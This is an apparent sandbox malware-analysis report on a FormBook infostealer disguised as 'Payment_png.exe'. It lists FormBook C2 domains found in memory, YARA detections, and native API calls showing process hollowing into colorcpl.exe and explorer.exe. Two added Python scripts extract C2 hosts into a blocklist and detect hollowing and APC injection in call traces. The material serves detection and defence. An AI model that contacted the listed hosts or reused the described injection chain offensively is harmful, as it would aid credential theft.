Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.pcpartout.com/c8bs/www.birkenhof-allgaeu.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.pcpartout.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.plowbrothers.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.plowbrothers.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.plowbrothers.com/c8bs/www.slutefuter.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.plowbrothers.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.quantify-co.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.quantify-co.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.quantify-co.com/c8bs/M
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.quantify-co.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.silverdollarcafe.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.silverdollarcafe.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.silverdollarcafe.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.slutefuter.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.slutefuter.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.slutefuter.com/c8bs/www.loversdeal.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.slutefuter.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.uforservice.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.uforservice.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.uforservice.com/c8bs/www.domennyarendi39.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.uforservice.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownHTTPS traffic detected: 170.249.199.106:443 -> 192.168.2.3:49714 version: TLS 1.2
      Source: C:\Windows\explorer.exeCode function: 6_2_06136EB2 OpenClipboard,
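The memory strings above are the usable network IOCs of this sample: several hosts share the same `/c8bs/` path, and where two strings sit next to each other in the dump the next host name is fused onto the path (`.../c8bs/www.slutefuter.com`), while fragments such as `Referer:` or a stray `D` are fused onto bare hosts. The script below is an added example, not part of the sandbox report, that turns such string dumps into a blocklist. It assumes, as an inference from these strings rather than something the report states, that a path shared by several hosts is the FormBook URI path and that a host-shaped segment following it is the next entry in the decrypted domain list; the sample input is a constructed subset of the lines listed above.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the "String found in binary or memory" values this
# report lists for the explorer.exe dump at 0x05603000, plus two font-vendor URLs from
# the same process that are benign noise. "Referer:" and "D" are adjacent strings in the
# dump, not part of the URL.
SAMPLE_STRINGS = [
    "http://www.plowbrothers.com",
    "http://www.plowbrothers.com/c8bs/",
    "http://www.plowbrothers.com/c8bs/www.slutefuter.com",
    "http://www.plowbrothers.comReferer:",
    "http://www.quantify-co.com/c8bs/M",
    "http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net",
    "http://www.slutefuter.com/c8bs/www.loversdeal.com",
    "http://www.uforservice.com/c8bs/www.domennyarendi39.net",
    "http://www.sakkal.com",
    "http://www.typography.netD",
]

# Lower-case host names only, so fused upper-case debris ("comReferer:", "netD") is cut
# off at the TLD instead of being swallowed into the host.
HOST = r"(?:[a-z0-9-]+\.)+[a-z]{2,6}"
URL_RE = re.compile(rf"https?://({HOST})((?:/[A-Za-z0-9._~%-]*)*)")
HOST_RE = re.compile(rf"^{HOST}$")


def extract_c2(strings, min_hosts=2):
    """Group URL strings by first path segment and return (c2_path, c2_hosts, noise).

    Assumption (inference from the strings, not stated by the report): a path segment
    shared by several hosts is the C2 URI path, and a host-shaped segment that follows
    the path is the next domain of the same list, fused because no NUL separated the
    two strings in memory.
    """
    hosts_by_path = defaultdict(set)
    bare_hosts = set()
    for s in strings:
        m = URL_RE.search(s)
        if not m:
            continue
        host, path = m.group(1), m.group(2)
        segments = [seg for seg in path.split("/") if seg]
        if not segments:
            bare_hosts.add(host)
            continue
        hosts_by_path[segments[0]].add(host)
        for seg in segments[1:]:
            if HOST_RE.match(seg):
                hosts_by_path[segments[0]].add(seg)
    shared = {p: hs for p, hs in hosts_by_path.items() if len(hs) >= min_hosts}
    if not shared:
        return None, [], sorted(bare_hosts)
    c2_path = max(shared, key=lambda p: len(shared[p]))
    c2_hosts = sorted(shared[c2_path])
    noise = sorted(bare_hosts - shared[c2_path])
    return c2_path, c2_hosts, noise


if __name__ == "__main__":
    path, hosts, noise = extract_c2(SAMPLE_STRINGS)
    print(f"C2 URI path: /{path}/")
    for h in hosts:
        print(f"  block http://{h}/{path}/")
    print("ignored (no C2 path):", ", ".join(noise))
```

Block on host plus path rather than on host alone where you can: FormBook domain lists mix attacker-registered names with legitimate sites the operator never controlled, and the shared path is the part that is specific to the campaign.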

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Payment_png.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Payment_png.exe
Source: C:\Users\user\Desktop\Payment_png.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02220438 EnumWindows,NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02224EE8 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02225331 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02220F83 NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02222992 NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221E27 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_0222542F NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02222033 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022220A1 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022204AF NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221AB4 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221E81 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022254F5 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022254CB NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022204D5 NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221F21 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02225338 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02225301 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221369 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02225544 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022253B4 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02222183 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02225380 NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221986 NtSetInformationThread,NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221F93 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221DEB NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022253EF NtMapViewOfSection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E96D0 NtCreateKey,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3EA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3EA770 NtOpenThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9760 NtOpenProcess,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3EAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9560 NtWriteFile,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9A10 NtQuerySection,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3EA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3EB040 NtSuspendThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_00565331 NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_00564EE8 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_00565301 NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_00565338 NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_005653EF NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_00565380 NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_005653B4 NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_0056542F NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_005654CB NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_005654F5 NtSetInformationThread,
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_00565544 NtSetInformationThread,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C495D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C496D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C496E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C495F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49560 NtWriteFile,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C4AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C497A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49760 NtOpenProcess,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C4A770 NtOpenThread,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C4A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C498F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C498A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C4B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C499D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49A10 NtQuerySection,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49A20 NtResumeThread,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C4A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C49B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_009681C0 NtCreateFile,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_009682F0 NtClose,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_00968270 NtReadFile,
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_009683A0 NtAllocateVirtualMemory,
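The native API stubs listed above (NtUnmapViewOfSection, NtWriteVirtualMemory, NtMapViewOfSection, NtSetContextThread, NtResumeThread, NtQueueApcThread, NtSetInformationThread) are the primitives behind the report's "process hollowing", "Queues an APC in another process" and "Hides threads from debuggers" signatures. The detector below is an added example, not code from the sandbox or from the sample, showing how an ordered call trace can be turned into those three verdicts. The trace format, the process names used as labels and the call order are constructed for the example; the report lists which stubs exist, not the sequence in which they ran.

```python
from collections import defaultdict

# ThreadInformationClass value for ThreadHideFromDebugger. A thread set this way stops
# delivering debug events, which is what "Hides threads from debuggers" means.
THREAD_HIDE_FROM_DEBUGGER = 0x11

# Ordered stages of classic process hollowing; each stage accepts any listed call.
# Calls that arrive out of order do not advance the state machine.
HOLLOWING_STAGES = (
    {"NtUnmapViewOfSection"},                        # carve out the original image
    {"NtWriteVirtualMemory", "NtMapViewOfSection"},  # place the payload in the target
    {"NtSetContextThread"},                          # point the main thread at it
    {"NtResumeThread"},                              # run it
)


def detect_injection(trace):
    """Walk an ordered (caller, api, args) trace and return findings.

    args is a dict. Cross-process calls carry "target", the process the handle refers
    to; NtSetInformationThread carries "info_class". Calls without "target" act on the
    caller's own address space and are ignored by the cross-process rules.
    """
    findings = []
    stage = defaultdict(int)  # (caller, target) -> index of the next hollowing stage
    for caller, api, args in trace:
        target = args.get("target", caller)
        if api == "NtSetInformationThread" and args.get("info_class") == THREAD_HIDE_FROM_DEBUGGER:
            findings.append(("thread_hidden_from_debugger", caller, target))
        if target == caller:
            continue
        if api == "NtQueueApcThread":
            findings.append(("apc_injection", caller, target))
        key = (caller, target)
        if api in HOLLOWING_STAGES[stage[key]]:
            stage[key] += 1
            if stage[key] == len(HOLLOWING_STAGES):
                findings.append(("process_hollowing", caller, target))
                stage[key] = 0
    return findings


# Constructed trace. Process names are reused from this report purely as labels; the
# order of calls is this example's own, not the sandbox's recorded sequence.
SAMPLE_TRACE = [
    ("Payment_png.exe", "NtSetInformationThread", {"info_class": 0x11}),
    ("Payment_png.exe", "NtCreateProcessEx", {"target": "colorcpl.exe"}),
    ("Payment_png.exe", "NtUnmapViewOfSection", {"target": "colorcpl.exe"}),
    ("Payment_png.exe", "NtAllocateVirtualMemory", {"target": "colorcpl.exe"}),
    ("Payment_png.exe", "NtWriteVirtualMemory", {"target": "colorcpl.exe"}),
    ("Payment_png.exe", "NtWriteVirtualMemory", {"target": "colorcpl.exe"}),
    ("Payment_png.exe", "NtSetContextThread", {"target": "colorcpl.exe"}),
    ("Payment_png.exe", "NtResumeThread", {"target": "colorcpl.exe"}),
    ("Payment_png.exe", "NtQueueApcThread", {"target": "explorer.exe"}),
    ("colorcpl.exe", "NtWriteVirtualMemory", {}),  # own address space: benign
]

if __name__ == "__main__":
    for finding in detect_injection(SAMPLE_TRACE):
        print(*finding)
```

The hollowing rule keys on the ordered pair (caller, target), so a loader that writes into two victims is reported twice, and a process writing into its own memory (the last trace entry, which is what an unpacker does all the time) never trips it. Hooking at the Nt* layer rather than at kernel32 is deliberate: the report shows these calls going through ntdll stubs followed by LdrInitializeThunk, which a kernel32-only hook set would miss.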
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3C6E30
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E46D616
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E472EF7
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E47DFCE
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E471FF1
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E46D466
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3B841F
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E471D55
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3A0D20
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E472D07
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E4725DD
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3D2581
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3BD5E0
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E45FA2B
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E4722AE
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E44CB4F
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E472B28
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CAB40
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3DEBB0
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E46DBD2
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E4603DA
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E4523E3
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3D138B
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3DABD8
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CA830
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E461002
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E47E824
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3D20A0
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3BB090
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E4728EC
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E4720A8
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3C4120
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3AF900
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3C99BF
Source: C:\Windows\explorer.exe | Code function: 6_2_0613A062
Source: C:\Windows\explorer.exe | Code function: 6_2_061358F9
Source: C:\Windows\explorer.exe | Code function: 6_2_061382FF
Source: C:\Windows\explorer.exe | Code function: 6_2_06135902
Source: C:\Windows\explorer.exe | Code function: 6_2_06138302
Source: C:\Windows\explorer.exe | Code function: 6_2_06136362
Source: C:\Windows\explorer.exe | Code function: 6_2_0613C5B2
